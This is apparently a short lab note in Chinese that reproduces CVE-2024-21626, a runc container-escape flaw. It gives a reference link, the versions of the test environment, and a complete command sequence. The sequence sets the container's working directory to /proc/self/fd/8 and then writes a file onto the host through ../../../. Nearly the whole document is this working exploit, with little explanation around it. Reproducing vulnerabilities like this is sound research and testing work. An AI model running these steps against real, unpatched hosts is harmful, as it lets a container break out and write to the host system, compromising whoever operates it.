參考資訊:
https://nitroc.org/posts/cve-2024-21626-illustrated/#%E6%9E%84%E9%80%A0%E6%81%B6%E6%84%8F%E9%95%9C%E5%83%8F%E5%AE%9E%E7%8E%B0%E5%88%A9%E7%94%A8
測試環境:
Ubuntu: 20.04.6 LTS (Focal Fossa)
Kernel: 5.8.0-23-generic
Runc: 1.1.7-0ubuntu1~20.04.1
Docker: 20.10.25, build 20.10.25-0ubuntu1~20.04.2
Containerd: 1.7.2
測試步驟:
$ docker run --name helper-ctr alpine
$ docker export helper-ctr --output alpine.tar
$ mkdir rootfs
$ tar xf alpine.tar -C rootfs
$ runc spec
$ sed -ri 's#(\s*"cwd": )"(/)"#\1 "/proc/self/fd/8"#g' config.json
$ grep cwd config.json
$ sudo runc --log ./log.json run demo
# echo "test" > ../../../tmp/cve-test
# exit
$ cat /tmp/cve-test
test